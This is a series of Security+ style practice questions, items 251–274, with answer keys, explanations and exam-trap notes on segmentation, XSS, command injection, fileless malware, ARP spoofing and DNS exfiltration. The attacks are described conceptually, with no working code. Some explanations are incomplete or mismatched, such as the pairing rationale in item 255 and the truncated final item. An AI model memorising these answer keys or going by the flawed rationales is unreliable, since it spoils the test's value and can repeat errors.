Option A is wrong because ARP spoofing manipulates MAC-to-IP mappings at Layer 2, not DNS cache entries; it would cause traffic interception on the local subnet but would not explain unexpected DNS resolver cache entries. Option C is wrong because port scanning is a reconnaissance technique used to discover open ports and services, not a method to redirect users to a fake login page or corrupt DNS records. Option D is wrong because a denial-of-service attack aims to overwhelm a service with traffic to make it unavailable, not to alter DNS resolution or present a fake login page.

251
Multi-Selectmedium

Which three of the following are core principles of the CIA triad in information security? (Choose three.)

Select 3 answers
.Confidentiality
.Integrity
.Availability
.Authentication
.Non-repudiation
.Authorization

Why this answer

The CIA triad is the foundational model for information security, consisting of Confidentiality, Integrity, and Availability. Confidentiality ensures data is accessible only to authorized users, often enforced through encryption (e.g., AES-256) and access controls. Integrity guarantees data has not been tampered with, using mechanisms like hashing (SHA-256) or digital signatures.

Availability ensures systems and data are accessible when needed, supported by redundancy (RAID, failover clusters) and DDoS mitigation.

Exam trap

Cisco often tests the distinction between the CIA triad and other security objectives like AAA (Authentication, Authorization, Accounting), leading candidates to mistakenly include Authentication or Authorization as core CIA principles.

252
Multi-Selecthard

A company is redesigning a customer portal. Internet users must reach only the web tier, the web tier must talk to the application tier, and the application tier must talk to the database tier. The security team also wants to reduce lateral movement if one server is compromised. Which three changes best meet these goals? Select three.

Select 3 answers
A.Place the web tier in a DMZ and publish only the reverse proxy or load balancer to the internet.
B.Put the web, application, and database servers in the same flat VLAN so routing is simpler.
C.Place the database tier in a separate internal subnet and allow traffic only from the application tier.
D.Use host-based or microsegmentation rules to restrict east-west traffic between tiers.
E.Give the database tier direct internet access for vendor patching and cloud backups.
AnswersA, C, D

A DMZ keeps the internet-facing systems in a separate trust zone, so the public attack surface is limited to the web layer. If one web server is compromised, the attacker does not automatically gain access to the application or database tiers. Putting only the reverse proxy or load balancer online further reduces exposure and centralizes filtering.

Why this answer

Option A is correct because placing the web tier in a DMZ and publishing only the reverse proxy or load balancer to the internet ensures that external users can only reach the web tier, not the application or database tiers. This aligns with the requirement to restrict internet access to the web tier only, while the reverse proxy or load balancer can inspect and forward traffic, reducing the attack surface. It also supports the goal of reducing lateral movement by isolating the web tier from internal networks.

Exam trap

The trap here is that candidates may think a flat VLAN simplifies routing and is acceptable for security, but CompTIA tests the principle of least privilege and network segmentation, where a flat network fails to prevent lateral movement after a breach.

253
MCQmedium

A vulnerability scan finds two issues: a critical deserialization flaw on a non-production lab server behind a VPN, and a high-severity privilege escalation flaw on the production jump server that administrators use to reach the rest of the environment. Which should be remediated first?

A.The lab server flaw, because critical severity always comes first
B.The jump server flaw, because it affects a production administrative access point
C.Neither issue, because VPN access reduces the need for urgent remediation
D.The lab server flaw, because non-production systems are always easier to patch later
AnswerB

A vulnerable jump server can provide broad access to the environment, so its risk is higher despite the lower severity label.

Why this answer

The jump server flaw must be remediated first because it is a high-severity privilege escalation vulnerability on a production system that administrators use as a gateway to the entire environment. Compromise of this jump server would give an attacker administrative access to all connected production systems, making the business impact far greater than the critical deserialization flaw on an isolated non-production lab server. In risk-based prioritization, severity alone is insufficient; the asset's role, exposure, and potential blast radius must be considered.

Exam trap

The trap here is that candidates fixate on CVSS severity scores (critical vs. high) without considering the asset's context, such as whether it is a production system, its role in the network architecture, and the potential for lateral movement, which CompTIA emphasizes in risk management and prioritization scenarios.

How to eliminate wrong answers

Option A is wrong because it incorrectly assumes that CVSS critical severity always dictates remediation priority, ignoring that the lab server is non-production, isolated behind a VPN, and does not handle sensitive data or provide access to production systems. Option C is wrong because VPN access does not eliminate the risk of compromise; an attacker who gains access to the VPN (e.g., via stolen credentials or a client-side exploit) could still reach the jump server, and the jump server's privilege escalation flaw would then allow lateral movement to all production assets. Option D is wrong because it suggests deferring remediation on non-production systems, but the critical deserialization flaw on the lab server could still be exploited if an attacker reaches it (e.g., via VPN or insider threat), and patching it is typically easier and lower risk than patching production systems, so it should be remediated promptly but not before the higher-impact production jump server flaw.

254
MCQmedium

A data analyst needs a copy of a customer file for product testing. The file includes names, email addresses, purchase history, and government ID numbers, but the test team only needs the names and purchase history. What is the BEST handling action?

A.Provide the full file because the test team is internal and already trusted.
B.Remove or mask the government ID numbers before sharing the minimum necessary fields.
C.Encrypt the file and send it by email to the entire test group.
D.Keep the file unchanged and rely on the team not to open the sensitive columns.
AnswerB

This is the best action because it follows data minimization and privacy principles. The test team does not need government ID numbers, so those fields should be removed or masked before the data is shared. Limiting the dataset to the minimum necessary information reduces privacy risk, lowers the chance of unauthorized disclosure, and aligns with common handling requirements for sensitive customer data.

Why this answer

Option B is correct because it applies the principle of least privilege and data minimization. The test team only needs names and purchase history, so removing or masking the government ID numbers before sharing the minimum necessary fields protects sensitive personally identifiable information (PII) and complies with data protection regulations like GDPR or CCPA. This action reduces the risk of unauthorized exposure of high-risk data while still enabling the test team to perform their work.

Exam trap

The trap here is that candidates may assume internal teams are automatically trusted and fail to apply data minimization, overlooking that even trusted users should only receive the minimum data necessary for their role.

How to eliminate wrong answers

Option A is wrong because internal trust does not justify exposing sensitive government ID numbers to a team that does not need them; this violates the principle of least privilege and could lead to a data breach. Option C is wrong because encrypting the file does not address the core issue of sharing unnecessary sensitive data; the government ID numbers would still be accessible to the entire test group once decrypted, and emailing the file to the entire group increases the risk of interception or accidental forwarding. Option D is wrong because relying on the team not to open sensitive columns is a weak security control; it depends on human behavior and does not prevent accidental or malicious access to the government ID numbers, which should be removed or masked as a technical control.

255
Matchingmedium

A company is redesigning how systems are separated in its office and data center network. Match each network design element to the scenario it best supports. Use each term once.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

A subnet that hosts public-facing web servers while keeping them separated from the internal LAN.

Separating finance and engineering workstations on the same switches into different broadcast domains.

A rule set that allows only TCP 8443 from the web tier to the application tier and denies everything else.

Restricting east-west traffic between individual workloads inside the same data center or cloud cluster.

Grouping systems that share similar security requirements and access assumptions for policy design.

Why these pairings

VLANs separate broadcast domains, subnets divide IP networks, ACLs filter traffic, DMZs isolate public servers, VPNs provide secure remote access, and NAT translates private to public IPs.

256
MCQmedium

Based on the exhibit, which awareness action should the security manager prioritize next?

A.Send the same annual awareness slide deck to everyone again without changing the content.
B.Launch role-based phishing training and reporting reinforcement for the highest-risk groups.
C.Block all external email so users cannot click suspicious messages.
D.Take no action because IT already reports suspicious messages well.
AnswerB

The results show that executives and customer support need the most help, especially because reporting is near zero for executives. Targeted training and practice campaigns are more effective than one-size-fits-all messaging because they address the actual behavior patterns shown in the exhibit.

Why this answer

The exhibit shows that the highest-risk groups (e.g., finance, executives) have the highest phishing click rates. Option B is correct because role-based phishing training targets these specific users with simulated phishing campaigns and reporting reinforcement, which directly reduces the likelihood of successful social engineering attacks. This aligns with the principle of prioritizing remediation based on risk assessment data rather than blanket training.

Exam trap

The trap here is that candidates may choose Option A (annual slide deck) because they assume any awareness training is sufficient, but the exam emphasizes that targeted, risk-based training is more effective than generic, one-size-fits-all approaches.

How to eliminate wrong answers

Option A is wrong because sending the same annual awareness slide deck without changes fails to address the specific high-risk groups identified in the exhibit, and it does not provide the hands-on, simulated phishing experience needed to change user behavior. Option C is wrong because blocking all external email is an overly restrictive technical control that would break legitimate business communication, and it does not address the root cause of user susceptibility to phishing. Option D is wrong because taking no action ignores the clear risk indicated by the high click rates in certain groups, and relying solely on IT reporting does not reduce the probability of a successful attack from users who click malicious links.

257
MCQmedium

A SOC analyst sees repeated encoded PowerShell launched by mshta.exe. No new executable is written to disk, but the host makes periodic outbound connections to the same IP. Which malware characteristic is most likely?

A.Fileless attack, because the malicious activity lives in memory and uses built-in tools.
B.Worm, because the host is making outbound connections to a remote system.
C.Spyware, because the host is communicating with an external IP address.
D.Rootkit, because the system tools are being hidden from the user.
AnswerA

Fileless attacks commonly abuse legitimate system utilities and leave little or no executable on disk. The use of PowerShell and mshta.exe strongly suggests living-off-the-land behavior designed to evade basic file-based detection.

Why this answer

The scenario describes encoded PowerShell commands executed by mshta.exe without writing a new executable to disk, which is a classic fileless attack technique. Fileless malware operates entirely in memory, leveraging legitimate system tools (like PowerShell and mshta) to evade traditional antivirus detection, and the outbound connections are for command-and-control (C2) communication, not for self-propagation or data theft.

Exam trap

The trap here is that candidates see 'outbound connections' and immediately think of a worm or spyware, but the key differentiator is the lack of a written executable and the use of built-in tools in memory, which defines a fileless attack.

How to eliminate wrong answers

Option B is wrong because a worm self-propagates across networks without user interaction, but the description only shows outbound connections to a single IP, not scanning or spreading to other hosts. Option C is wrong because spyware specifically steals user data (e.g., keystrokes, files) and typically exfiltrates to a C2 server, but the question focuses on the execution method (memory-resident) and does not indicate data collection. Option D is wrong because a rootkit hides system objects (files, processes, registry keys) from the OS, but the scenario does not mention any concealment of tools or persistence mechanisms; it simply shows a process (mshta.exe) running PowerShell in memory.

258
Multi-Selecthard

A report generator accepts a user-supplied report name and then passes it into a shell command to convert a file. During testing, a malicious value causes the server to run an unexpected system command. Which two changes best mitigate this issue while keeping the feature usable? Select two.

Select 2 answers
A.Replace shell command concatenation with a parameterized API or safe library call.
B.Apply strict server-side allowlist validation to the report name before processing.
C.HTML-encode the report name before inserting it into the shell command.
D.Switch the feature from POST to GET so the values are easier to inspect.
E.Hide the server error messages so attackers cannot see the failure details.
AnswersA, B

Avoiding direct shell invocation removes the attacker-controlled command injection path. A safe API or library call passes data as data instead of executable syntax. This is the most effective fix because it eliminates the dangerous pattern rather than trying to filter every possible payload.

Why this answer

Option A is correct because replacing shell command concatenation with a parameterized API or safe library call prevents command injection by ensuring user input is treated as data, not executable code. This is the most effective mitigation because it eliminates the injection vector entirely, rather than trying to sanitize or validate input that may still be passed to a shell interpreter.

Exam trap

The trap here is that candidates often choose HTML encoding (Option C) thinking it sanitizes all injection types, but HTML encoding only prevents XSS, not command injection, which requires shell-specific escaping or, better, avoiding shell invocation altogether.

259
MCQmedium

A network engineer needs to change an ACL on a production firewall so a new SaaS integration works. The business cannot tolerate an extended outage, and the change must be reversible if testing fails. Which practice best fits?

A.Make the change directly during business hours without documentation
B.Follow formal change management with approval, testing, and rollback planning
C.Disable logging temporarily so the firewall change applies faster
D.Ask the vendor to modify the firewall remotely without internal review
AnswerB

Change management provides traceability, validation, and a prepared rollback path for production changes.

Why this answer

Formal change management ensures the ACL modification is documented, tested in a staging environment, and includes a rollback plan (e.g., reverting to a saved configuration or applying a 'no' command for the specific ACL entry). This minimizes downtime by allowing controlled implementation and immediate reversal if the SaaS integration fails, aligning with the business's zero-tolerance for extended outages.

Exam trap

The trap here is that candidates may think making changes quickly (Option A) or disabling logging (Option C) is acceptable for a 'simple' ACL change, but the SY0-701 exam emphasizes that any production change must follow formal change management to ensure reversibility and minimize risk.

How to eliminate wrong answers

Option A is wrong because making changes directly during business hours without documentation violates change management principles, risks unplanned outages, and provides no rollback path, which is unacceptable for a production firewall. Option C is wrong because disabling logging does not speed up ACL application—firewall ACLs are processed in hardware or software regardless of logging state; it only hides audit trails, making troubleshooting and rollback harder. Option D is wrong because asking the vendor to modify the firewall remotely without internal review bypasses security controls, violates the principle of least privilege, and could introduce unauthorized changes or misconfigurations that are not reversible by the network engineer.

260
MCQmedium

Based on the exhibit, which identity architecture change best addresses the repeated password resets and delayed offboarding across the company's SaaS applications? Exhibit: - SaaS A uses local user accounts - SaaS B uses local user accounts - SaaS C supports SAML and automated provisioning - Help desk reports 120 password reset tickets per month - Former employees can remain active in two apps for up to 24 hours after termination Management wants one sign-in and faster deprovisioning.

A.Implement federated SSO with the enterprise identity provider and automated provisioning for SaaS users.
B.Create one shared account for each application and store the passwords in a vault.
C.Keep local accounts in every SaaS app and reset passwords whenever staff change roles.
D.Put the SaaS apps behind a network firewall and use source IP filtering instead of identity.
AnswerA

This is the best answer because federation centralizes authentication, and automated provisioning improves lifecycle management. Users sign in once through the identity provider, reducing password fatigue and help desk resets. When accounts are created, modified, or removed centrally, access changes can reach supported applications much faster, which helps with offboarding and reduces orphaned access.

Why this answer

Option A is correct because implementing federated SSO with the enterprise identity provider (IdP) centralizes authentication, allowing users to sign in once. Combined with automated provisioning (SCIM), it enables near-instant deprovisioning when an employee is terminated, eliminating the 24-hour delay and reducing password reset tickets by removing the need for local account management.

Exam trap

The trap here is that candidates confuse network-layer controls (firewall, IP filtering) with identity-layer solutions, failing to recognize that only federated SSO with automated provisioning addresses both single sign-in and rapid deprovisioning across SaaS apps.

How to eliminate wrong answers

Option B is wrong because shared accounts violate the principle of least privilege and non-repudiation; password vaults do not solve delayed offboarding or reduce password resets, as shared credentials still require manual rotation and do not integrate with identity lifecycle management. Option C is wrong because keeping local accounts and resetting passwords on role changes does not address the 120 monthly password reset tickets (it perpetuates them) and fails to provide faster deprovisioning, as local accounts remain active until manually disabled. Option D is wrong because network firewall and source IP filtering control access at the network layer, not the identity layer; they cannot enforce per-user authentication, single sign-on, or automated deprovisioning, and former employees could still access apps from allowed IPs.

261
MCQmedium

A security analyst is investigating a series of alerts from the web application firewall. Users are reporting that when they view a product review page on the company's e-commerce site, their browser automatically redirects to a malicious website. The analyst examines the database and finds that a product review submitted by a user contains a <script> tag that loads a JavaScript file from an external domain. Which type of attack has occurred?

A.Cross-site request forgery (CSRF)
B.Stored cross-site scripting (XSS)
C.SQL injection
D.Reflected cross-site scripting (XSS)
AnswerB

This is correct. The injected script is permanently stored in the database (in the product review) and executes when other users view the page, which is the defining characteristic of stored (persistent) XSS.

Why this answer

The attack is stored cross-site scripting (XSS) because the malicious <script> tag was permanently stored in the product review database. When any user views the product review page, the browser loads and executes the external JavaScript file from the attacker's domain, causing an automatic redirect to a malicious website. This matches the classic stored XSS pattern where payload persists in server-side storage and executes in the victim's browser context.

Exam trap

The trap here is confusing stored XSS with CSRF because both involve user interaction and redirects, but stored XSS is about injecting persistent client-side code, while CSRF forges requests without injecting scripts.

How to eliminate wrong answers

Option A is wrong because cross-site request forgery (CSRF) tricks an authenticated user into performing unintended actions on a trusted site, not injecting client-side scripts that execute in the browser. Option C is wrong because SQL injection targets the database layer by manipulating SQL queries to extract or modify data, not by injecting HTML/JavaScript that executes in the user's browser.

262
MCQmedium

After restoring a virtual file server from backup, users can browse folders, but an accounting application reports missing recent transactions. What should the administrator do next?

A.Mark the restore complete because the file server is reachable
B.Verify the restore in an isolated test environment and compare application data consistency
C.Immediately run a new full backup over the restored server
D.Disable the accounting application permanently to prevent further inconsistency
AnswerB

This confirms whether the backup is usable and whether application data and transaction state were recovered correctly.

Why this answer

The correct next step is to verify the restore in an isolated test environment and compare application data consistency. Although the file server is reachable and folders appear intact, the accounting application's missing recent transactions indicate that the restored data may be stale or incomplete. Testing in isolation ensures the application's database or transaction logs are consistent with the backup point before returning the server to production, preventing data corruption or loss.

Exam trap

The trap here is that candidates assume file server accessibility equals a successful restore, overlooking the critical distinction between file-level availability and application-level data consistency, which is a common focus in CompTIA SY0-701 Security Operations questions.

How to eliminate wrong answers

Option A is wrong because marking the restore complete based solely on file server reachability ignores application-level data integrity; the accounting application's missing transactions prove the restore is incomplete or inconsistent. Option C is wrong because immediately running a new full backup over the restored server would overwrite the current state without validating data consistency, potentially preserving corruption or missing data in the backup chain. Option D is wrong because disabling the accounting application permanently is an extreme, unnecessary action that does not address the root cause of data inconsistency and disrupts business operations.

263
MCQmedium

A manufacturer wants partner-company users to access a procurement portal using their own company identities. The manufacturer does not want to create local accounts for each partner user, but it still needs to control what those users can do in the portal. Which approach should be used?

A.Create one shared partner account for each external company and reuse the same password.
B.Use federated identity with role mapping so the portal trusts each partner’s identity provider.
C.Synchronize every partner user into the manufacturer’s directory and require a separate password change.
D.Store partner passwords in the portal database and use password reset emails for access control.
AnswerB

Federation lets external users authenticate with their own identity provider while the manufacturer still controls authorization inside the portal. Role mapping converts trusted identity assertions into specific portal permissions, which avoids local account sprawl and simplifies offboarding at the partner side.

Why this answer

Federated identity with role mapping allows the manufacturer to trust authentication performed by each partner's own identity provider (IdP) using standards like SAML 2.0 or OpenID Connect. This eliminates the need for local accounts while enabling fine-grained access control through roles or attributes passed in the assertion, ensuring partners can only perform authorized actions in the portal.

Exam trap

The trap here is that candidates often confuse federation with synchronization, thinking that syncing user accounts into a local directory is the only way to control access, when in fact federation with role mapping provides both authentication delegation and authorization control without storing external user credentials.

How to eliminate wrong answers

Option A is wrong because a single shared account with a reused password violates the principle of least privilege, provides no audit trail for individual user actions, and creates a massive security risk if the password is compromised. Option C is wrong because synchronizing every partner user into the manufacturer's directory defeats the purpose of avoiding local account management, introduces synchronization latency and complexity, and forces partners to manage yet another set of credentials. Option D is wrong because storing partner passwords in the portal database is a direct violation of secure credential storage best practices (e.g., NIST SP 800-63B), and relying on password reset emails for access control is insecure and unscalable for multiple external organizations.

264
MCQeasy

Which document should define mandatory settings such as full-disk encryption, a 10-minute screen-lock timeout, and removal of local administrator rights on company laptops?

A.Policy, because it explains the general direction but not the exact settings.
B.Standard, because it defines specific required configurations that must be followed.
C.Procedure, because it lists the steps an end user should take every day.
D.Guideline, because it offers flexible recommendations rather than mandatory rules.
AnswerB

This is correct because a standard turns policy into measurable, mandatory requirements. Exact settings such as encryption, screen-lock timing, and administrative restrictions belong in a standard since they must be applied consistently across similar systems. Standards help administrators implement security in a uniform, auditable way.

Why this answer

Option B is correct because a standard defines mandatory, specific technical configurations that must be uniformly applied across all company laptops. The question lists concrete settings (full-disk encryption, 10-minute screen-lock timeout, removal of local admin rights) that are not open to interpretation, which aligns precisely with the role of a security standard in enforcing baseline compliance.

Exam trap

The trap here is that candidates confuse 'policy' (high-level direction) with 'standard' (specific mandatory configuration), leading them to pick A when the question explicitly lists concrete, enforceable settings rather than general principles.

How to eliminate wrong answers

Option A is wrong because a policy states high-level intentions and management direction (e.g., 'laptops must be secured'), but does not include the exact technical settings like '10-minute screen-lock timeout' or 'full-disk encryption'. Option C is wrong because a procedure describes step-by-step actions an end user or administrator must perform (e.g., 'how to enable BitLocker'), not the mandatory configuration values themselves. Option D is wrong because a guideline offers flexible, non-mandatory recommendations (e.g., 'consider using full-disk encryption'), whereas the question explicitly requires mandatory settings that must be followed.

265
MCQmedium

A customer portal runs on a single application server behind a database cluster. Leadership wants the portal to keep working if that application server fails, but the budget is tight and the team wants the simplest design that can automatically fail over. What should they add?

A.A second application server configured as an active-passive failover pair with health checks.
B.A cold backup server that is started manually after the outage is detected.
C.A multi-region active-active deployment with global traffic steering.
D.Additional RAID storage in the application server to prevent service interruption.
AnswerA

An active-passive pair provides automatic failover for a single server failure without the cost and complexity of a larger multi-node design. Health checks let the standby take over when the primary becomes unavailable, which matches the stated availability goal and budget constraint.

Why this answer

Option A is correct because an active-passive failover pair with health checks provides automatic failover at the lowest complexity and cost. The passive server remains on standby, and health checks (e.g., ICMP, TCP port checks, or HTTP GET requests) detect application server failure, triggering automatic IP or service takeover. This meets the requirement for automatic failover without the expense and complexity of active-active or multi-region designs.

Exam trap

The trap here is that candidates often confuse high availability with disaster recovery, assuming that a cold backup or RAID storage provides automatic failover, when in fact only a hot standby with health checks meets the automatic requirement without over-engineering the solution.

How to eliminate wrong answers

Option B is wrong because a cold backup server that is started manually does not provide automatic failover; it requires human intervention, which violates the requirement for automatic failover. Option C is wrong because a multi-region active-active deployment with global traffic steering is far more complex and expensive than needed for a single application server failure; it introduces DNS-level steering, cross-region replication, and higher operational overhead. Option D is wrong because additional RAID storage only protects against disk failure within the server, not against the entire application server failing; it does not provide any server-level redundancy or failover capability.

266
MCQmedium

Based on the exhibit, which cloud service model best fits the application's operational and security requirements?

A.Infrastructure as a Service (IaaS), because it gives full control over the guest operating system.
B.Platform as a Service (PaaS), because it offloads OS and runtime maintenance while preserving application control.
C.Software as a Service (SaaS), because the organization would not need to maintain anything.
D.Colocation, because the team can place its own servers in a provider facility and manage everything directly.
AnswerB

PaaS fits the requirements because the provider manages the underlying platform, including OS patching, runtime maintenance, and scaling features. The development team can still deploy code and manage the application layer and data model, which matches the scenario. This is a strong secure-service-selection choice when the goal is to reduce patching burden without giving up application control.

Why this answer

The exhibit shows an application that requires the organization to manage the application code and data while offloading the underlying OS, runtime, and middleware maintenance. Platform as a Service (PaaS) provides this exact split: the cloud provider handles the OS patches, runtime updates, and infrastructure scaling, while the organization retains full control over the application deployment and configuration. This matches the requirement of preserving application control without the overhead of managing the guest OS.

Exam trap

The trap here is that candidates see 'full control' in option A and assume it is always better for security, but the question's requirement to offload OS maintenance makes PaaS the correct choice—IaaS would actually increase the security burden by requiring the organization to manage guest OS hardening and patching.

How to eliminate wrong answers

Option A is wrong because IaaS gives full control over the guest OS, but the requirement specifically states the organization does not want to manage the OS or runtime—IaaS would force them to handle patching, hardening, and maintenance of the OS, which contradicts the operational need. Option C is wrong because SaaS would offload everything, including application control, but the requirement explicitly says the organization must preserve control over the application code and data—SaaS removes that control entirely. Option D is wrong because colocation requires the organization to manage all hardware, OS, and software layers themselves, which is the opposite of offloading OS and runtime maintenance; it also introduces physical security and hardware lifecycle burdens not aligned with the stated requirements.

267
Multi-Selecteasy

A company is building a public web app with three tiers. Internet users should reach only the web tier, and the app tier should never be reachable from the internet. Which two network design choices support this goal? Select two.

Select 2 answers
A.Place the web server in a DMZ or public-facing zone.
B.Allow inbound traffic from the internet directly to the application servers.
C.Restrict the application tier so only the web tier can initiate connections to it.
D.Put the database on the guest Wi-Fi VLAN.
E.Use the same flat network for all three tiers.
AnswersA, C

A DMZ is the standard place for internet-facing services because it creates a controlled boundary between public traffic and internal systems. It lets the web tier accept external requests without exposing deeper resources.

Why this answer

Option A is correct because placing the web server in a DMZ (demilitarized zone) or public-facing zone allows internet traffic to reach only the web tier while isolating the internal network. This is a standard security architecture where the DMZ acts as a buffer, and firewall rules permit inbound HTTP/HTTPS (ports 80/443) only to the web servers, not to the application or database tiers.

Exam trap

The trap here is that candidates may think placing the app tier behind a firewall alone is sufficient, but they must also explicitly restrict inbound connections to only the web tier, not just block the internet—otherwise internal lateral movement or misconfigured rules could still expose the app tier.

268
Multi-Selectmedium

A firewall rule was added directly in production to allow a new vendor IP range, and an internal service stopped responding because the new rule was placed above an existing deny rule. Which two change-management practices would have reduced the risk? Select two.

Select 2 answers
A.Test the rule in a staging environment that mirrors production
B.Require peer review and approval with a documented rollback plan
C.Apply the change during peak business hours to notice problems quickly
D.Disable firewall logging during the change to reduce noise
E.Skip documentation because the rule only affects one vendor
AnswersA, B

Testing in a realistic environment helps catch rule-order and access-side effects before production deployment.

Why this answer

Option A is correct because testing the rule in a staging environment that mirrors production allows you to verify the rule's behavior—specifically its placement relative to existing deny rules—without risking service disruption. In a firewall rulebase, rules are processed top-down, and a new permit rule placed above a deny rule can inadvertently match and permit traffic that was previously denied, or conversely, block traffic if the rule is misordered. Staging testing would have revealed that the new rule's position caused the internal service to stop responding, enabling adjustment before production deployment.

Exam trap

The trap here is that candidates often focus only on testing the rule's content (e.g., IP addresses and ports) and overlook the critical importance of rule order and placement in a sequential firewall rulebase, leading them to choose options like disabling logging or skipping documentation instead of recognizing that peer review and staging testing directly address ordering risks.

269
MCQhard

Based on the exhibit, which temporary control best reduces risk until the patch is released?

A.Increase scan frequency to daily and leave the service exposed.
B.Place the service behind a reverse proxy or WAF and restrict access with source IP allow lists.
C.Disable TLS so the traffic can be inspected more easily.
D.Move administrative access to the same 443 listener as user traffic.
AnswerB

The service must stay online, but the patch is unavailable, so the best temporary measure is to reduce exposure. A reverse proxy or WAF can filter malicious requests, and source IP allow lists shrink the reachable attack surface. Together, those controls act as an effective compensating measure until the vendor fix is released and can be applied.

Why this answer

Option B is correct because placing the service behind a reverse proxy or Web Application Firewall (WAF) with source IP allow lists provides a temporary compensating control that reduces the attack surface until the vendor releases a patch. The reverse proxy or WAF can inspect and filter malicious traffic, while IP allow lists restrict access to trusted sources only, mitigating the risk of exploitation without removing the service entirely.

Exam trap

CompTIA often tests the misconception that increasing monitoring (scan frequency) is a sufficient compensating control, when in fact it does not prevent exploitation—only detection is improved.

How to eliminate wrong answers

Option A is wrong because increasing scan frequency does not reduce risk; it only detects potential issues sooner, leaving the vulnerable service exposed to active exploitation. Option C is wrong because disabling TLS removes encryption, exposing all traffic to interception and tampering, which violates confidentiality and integrity, and does not address the underlying vulnerability. Option D is wrong because moving administrative access to the same 443 listener as user traffic increases the attack surface by merging management and user channels, making it easier for an attacker to target administrative functions.

270
MCQmedium

An investigator receives a suspect laptop drive that may be used in court. Which approach best supports a forensically sound image while protecting the original media?

A.Mount the drive read-write so the investigator can browse it quickly.
B.Use a hardware write blocker and create a bit-by-bit forensic image with hashes.
C.Copy only the user profile folders with a file manager to save time.
D.Boot the laptop normally and use backup software to duplicate the disk.
AnswerB

This is the best practice because a hardware write blocker prevents any accidental writes to the source drive, and a bit-by-bit image captures the exact data structure for analysis. Hashing the source or image before and after acquisition provides integrity verification, which is essential when evidence may be challenged later. Together, these steps protect the original media and support chain of custody and courtroom admissibility.

Why this answer

Option B is correct because forensic best practice requires preserving the original media in an unaltered state. A hardware write blocker physically prevents any write commands from reaching the drive, ensuring the original evidence is not modified. Creating a bit-by-bit forensic image (e.g., with `dd` or FTK Imager) captures the entire drive, including slack space and unallocated sectors, and generating cryptographic hashes (SHA-256 or MD5) before and after imaging verifies the image's integrity for court admissibility.

Exam trap

The trap here is that candidates may think booting the laptop or using a file manager is acceptable for a quick preview, but any write access—even seemingly harmless metadata updates—renders the evidence inadmissible under Daubert or Frye standards.

How to eliminate wrong answers

Option A is wrong because mounting the drive read-write allows the operating system to write metadata (e.g., timestamps, directory entries) to the drive, altering the original evidence and breaking the chain of custody. Option C is wrong because copying only user profile folders with a file manager omits critical data such as deleted files, file system metadata, and unallocated space, which may contain evidence; it also modifies file access times. Option D is wrong because booting the laptop normally writes temporary files, logs, and registry changes to the drive, and backup software typically does not create a bit-for-bit copy, altering the original media and compromising forensic soundness.

271
Multi-Selecteasy

A network analyst reviews packet captures from a subnet where users intermittently lose access to the gateway. Which two findings would most strongly indicate ARP spoofing? Select two.

Select 2 answers
A.Repeated unsolicited ARP replies map the gateway IP to a different MAC address.
B.Several hosts suddenly send gateway traffic to the same unexpected MAC address.
C.Extra DNS traffic appears during the lunch hour.
D.A switch port negotiates a slower speed than usual.
E.The wireless network name appears in a site survey.
AnswersA, B

Repeated unsolicited ARP replies are a classic sign of spoofing on a LAN.

Why this answer

ARP spoofing involves an attacker sending forged ARP replies to associate the gateway's IP address with the attacker's MAC address. Repeated unsolicited ARP replies mapping the gateway IP to a different MAC address is a classic indicator, as legitimate ARP replies are normally solicited by requests. This causes traffic intended for the gateway to be redirected to the attacker, enabling interception or disruption.

Exam trap

CompTIA often tests the distinction between ARP spoofing (unsolicited ARP replies) and ARP cache poisoning (where the attacker responds faster than the legitimate host), and candidates may confuse extra DNS traffic or physical issues with ARP-based attacks.

272
MCQhard

Based on the exhibit, what is the BEST fix for the vulnerability being exploited? A user with a standard account can retrieve documents by changing the `docId` value in the request. The application returns another employee's file without any authorization error.

A.Add client-side JavaScript to hide document IDs from the user interface.
B.Enforce server-side object-level authorization checks before returning any document.
C.Require users to change passwords more frequently to prevent unauthorized document access.
D.Place the document server behind a load balancer to prevent direct access to the application.
AnswerB

The application is returning objects to an authenticated user without verifying whether that user is allowed to access each specific record.

Why this answer

The vulnerability is an Insecure Direct Object Reference (IDOR), where the application trusts user-supplied input (the `docId` parameter) without verifying that the authenticated user is authorized to access the requested document. The best fix is to enforce server-side object-level authorization checks before returning any document, ensuring that the server validates the user's permissions against the specific resource ID before processing the request.

Exam trap

The trap here is that candidates may confuse client-side hiding (option A) with a valid security control, but the SY0-701 exam emphasizes that all access control must be enforced server-side, as client-side controls are trivially bypassed.

How to eliminate wrong answers

Option A is wrong because client-side JavaScript hiding of document IDs is security by obscurity and can be easily bypassed by inspecting network traffic or modifying requests with tools like Burp Suite; it does not prevent direct manipulation of the `docId` parameter. Option C is wrong because requiring more frequent password changes addresses credential management, not authorization flaws; it does not prevent an authenticated user from accessing unauthorized documents via IDOR. Option D is wrong because placing the document server behind a load balancer only distributes traffic and does not enforce any authorization checks; it does not mitigate the underlying issue of missing access controls on individual objects.

273
Matchingeasy

Match each cloud security concept to the best description.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Defines which security tasks belong to the cloud provider and which remain with the customer

Separates one customer's cloud resources from another customer's resources

Uses the provider's logging service to record workload and control-plane activity

Places workload resources where they are not directly exposed to the internet

Why these pairings

Each cloud security concept is matched to its primary function: encryption protects data at rest or in transit, IAM manages access, SIEM provides event analysis, IDS detects intrusions, and DLP prevents data loss.

274
MCQmedium

A security analyst at a financial firm notices a significant increase in DNS queries from an internal server to a rarely visited external domain. The queries are for unusual subdomain names that contain encoded data. The server is not a DNS server and does not typically generate outbound traffic. Which of the following is the MOST appropriate immediate action for the analyst to take?

A.Block all outbound DNS traffic from the server immediately.
B.Isolate the server from the network to prevent further data loss.
C.Create a firewall rule to log all further DNS queries from the server.
D.Run an antivirus scan on the server.
AnswerB

Isolation effectively stops the ongoing DNS tunneling by severing the server’s network connectivity. This contains the incident, prevents additional data exfiltration, and provides a controlled environment for further forensic analysis. It aligns with standard incident response procedures.

Why this answer

The server is exhibiting signs of a DNS data exfiltration attack, where encoded data is being tunneled through DNS queries to an external domain. Isolating the server immediately stops the data loss and prevents further compromise, which is the most critical first step in incident response. Blocking traffic or scanning alone would not halt the active exfiltration, and logging without action allows continued data theft.

Exam trap

The trap here is that candidates choose to log or scan first, mistaking detection for containment, but the SY0-701 emphasizes immediate isolation to stop data loss in active exfiltration scenarios.

How to eliminate wrong answers

